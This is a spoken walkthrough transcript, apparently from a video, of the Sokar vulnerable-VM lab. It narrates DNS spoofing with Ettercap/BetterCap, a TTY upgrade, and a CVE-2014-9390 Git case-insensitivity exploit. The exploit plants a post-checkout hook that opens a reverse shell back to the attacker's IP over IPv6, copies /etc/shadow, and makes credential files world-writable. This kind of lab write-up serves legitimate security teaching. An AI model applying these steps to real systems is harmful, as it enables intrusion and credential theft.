Object dump is... Let's do strings in the binary. Strings build. glibc, nothing there. I'm going to pause the video and we will wait like 5 minutes to see if it's a cache issue. So let's test this again and see what happens. Not strings, I want /build, yes, and still cannot resolve that host name. So something is going on that is preventing Ettercap from sending the spoofed request. Let's do help real quick. Spoof and DNS spoof is running. Events stream start, or is it on? I think it's on. Sending spoof DNS reply for Sokar dev to me. Could also be weird because I'm doing this in VMs on bridge networks. 1610. Sounds right. Let's just exit and redo this. Set spoof target 138. Okay. Help DNS spoof. Set DNS spoof all to true. We'll leave it on interface default. Let's set DNS spoof on, set up spoof on, active, not set, spoof on, and DNS spoof on. Does it work now? This is what I get for not testing BetterCap first. Should work, but it doesn't. Oh wait, cannot connect to on port 20. Oh my frickin' god. Service SHD start. It worked one time. Because we see this, connect to host on port 22, connection refused. And now we're getting name of service not known. So it just doesn't work all the time. I'm guessing there's some timing thing. But we have it working. And something happened to my TTY. Python C import pty pty.spawn then sh. I think I typed that wrong. Crap. Exit. Well, we'll control C one more time. Xterm to 56. Man, let's see. Python C. Spawn. See if this works. Really don't want to get a shell again. There we go. Thank God. That has been repaired. So, it looks like for some reason the DNS spoof just isn't happening 100% of the time. But it is happening, so that is good. We can search exploit for Git to see if there's any exploits in this. Git command injection and Metasploit. Let's see. Let's see what version of Git is running. Git -- version 2.2.0. So potentially that Metasploit module. But I'd like to avoid Metasploit if we can. Git stack. Huh. Let's see. Git 2.20 exploit. Git. This sounds good. It's been found in Git 2220 and has been classified as critical. Let's look at what this is. Ability. There's testing it. Exploiting. Is there a CVE assigned to this? There is 2014 9390. Let's see. Vulnerabilities. This is the Metasploit again. Let's try adding like POC. And we have one, I think. POC for CVE 2014 9390. Commit. Tags. I don't think that's POC. This looks like a good write-up, though. Let's see. Details can be found here. See if we can see. An attacker can craft a malicious Git tree that will cause Git to overwrite its own Git config. When cloning or checking out a repository, Git clients running OS X, HFS, or any version of NTFS or FAT are exploitable through this vulnerability. Linux are not affected because it is a case-sensitive file system. However, if we look at this, let's see, it's cloning into /mnt, which is mount. When we look at that, it is mounted via, let's see, non-proc. Here we go, vfat. So mount is not a case-sensitive file system. We could do touch. We can actually go into that. Oh no. Touch A, touch lowercase a, and only one exists. If we echo test into capital A, and then cat lowercase a, we see it. Because again, vfat is not a case-sensitive thing. So that's why the vulnerability is existing on Linux. And we have this page that just tells us how to do it. So, let's see. Make dir. Trying to skim this fast and probably missing things. Let's just go and do it. I think I can piece this together. So we have to do this on a root box. And we will have to do this probably in /root. Then we have to make the directories. So make dir-p, so we can make multiple directories at the same time. Secret project /.git hooks cd secret project. We'll do a git init. Then we want to git add. Then we can do cd.capital-git hooks v post checkout bin sh. We want to execute a reverse shell. So we do 16.10.168. And just in case the reverse shell doesn't work, I'm going to add a sticky bit to VI because I think I can PrivEsc from that. That looks good. Git add post checkout. It's odd, unable to add. I wonder if this version of Git just doesn't let you do the exploit. Let's go back to Sokar and do pretty much the same exact things. So go to our home directory, make dir-p secret project /.git hooks, cd in there, git init. Okay, we got two different gits. And the reason why we can't do this in the /mount is because it doesn't care about casing. What we want to do is create a .git with a lowercase g because this is going to be needed to pull the file. If we don't have this directory and it's capital G, when it goes to pull the file, it's going to say it doesn't exist. But we're going to have the config also say, hey, add this file with the capital G, which Windows takes as the same thing. So after we do the exploit, I can walk through it real quick, and hopefully you can understand it, what's going on. So we just did the get init, so let's v to the capital one, hooks, post checkout, and let's copy what I have here. Okay, so we should be able to get add and add everything. Oh, we forgot to chmod it. Chmod plus x dot get hooks post checkout. Then get commit -m initial. And changed, and we can see we added the file .get with a capital G. Now what we have to do is get this file to our host box, so we can do tar-cjvf secret project.tar.bz2, and then the directory. So zip it up, and then base 64. What's the file? Secret project.tar.bz2. Next step is to copy it, and I don't know what I just did. Oh, I changed to pane 1. Highlight everything. Go back to a root box. Remove everything with secret project, and then we can vim secret project.tar.bz2.b64. Paste. Okay, then we can base 64-d tar xjvf to extract. Okay, we can go down here, run build. We should ncat lvnp 8080. Already listening. That's not good. Burp, proxy, options, off. That's why you never use port 8080. Yes. Type my password. I think I mistyped it. It's hung. We'll see if it gets it. Started pulling it down. Wonder if I mistyped my IP address. 172.16.10.168. It could also be the port it can't get to. Control C. Let's go to mount secret project.get hooks. Post checkout does exist, and it is executable. 172.16.10.168. Correct IP. I don't know what happened there. Let's look at VI. We do have a set UID bit on VI, so we can just do bin VI, bin SH, and that did not work. I thought it would have. Bin bash. Nope. I guess it's not taking advantage of that set UID bit. That's a shame. So we'll have to redo our exploit. see. I wonder if we can just edit it. Get hooks. Then post checkout. chmod all 7s on Etsy pass WD, and we'll just say port 80 on that. Get commit -m fixed. It looks like it does let us do that. So let's see. Ncat LVNP 80 already in use. What am I using it for? Oh, that reverse shell crap. Vim.get hooks. We'll say 443. Still no shell. I should just do IPv6. I don't know why I'm not. We know that'll get out. -LA, Etsy, pass WD. It's all writable anyways, so we can change root path. I wanted shadow. This is the last time we have to do this. Third time is the charm. Can't make a mistake anymore. Made them all. Etsy shadow. If config. Let's grab this. Copy. Set ETH 0. I think that's how we did it. Then add, commit, netcat -6 LVNP 443. Mount, secret project. Now let's do this. Build, yes. And there we go. IPv6 did work. We can do IPTables -L and see what's going on. So, on a chain output, root can do SSH. And we couldn't direct it to port 22 because that's where SSH is listening for whatchamacallit. Get. See, is it a -L flag? Or -N? There we go. So, he's also can get out on port 53. State established. Maybe we could have done... Oh no, that's for the website. GID matches 501 to 51242. Let's see. ID. I may have been able to do 51242 with bin bash because my GID, I can't tell if it would be 502 or not. I believe it would be. So that's the port we should have used. We could test that. Vim. $72, 16, 10, 168. And that's the port from the mail a long time ago that we kind of ignored because we just used IPv6. Mount secret project. No, maybe not. Or I made a typo. Anyways, how this exploit actually worked, what's happening in the background is I guess we can see it. If we go into secret project and .get hooks, we have post checkout. And that happened because if we go back to where we actually obey cases and it's case sensitive, we have two directories. We have this .get and this .get with a capital G. We were able to add this .get with a capital G into the deployment script of the .get essentially. So the very first thing that pulls down is it pulls down this .git directory. This .git directory then goes, oh, hey, above me, there's this directory called .git with a capital G. Go pull that down, and that has the file hook/post checkout. And because Windows doesn't obey cases, what happened was it said, okay, I'm going to go to .git, which is .lowercase git because it's case insensitive, and then go into hooks and put that post checkout. So we're able to go have write access to the .git folder by using a weird case, if that makes sense. Hope it does. But I think that is the box. I hope you guys learned a lot, and probably do a Hack the Box video next week. Take care. Later.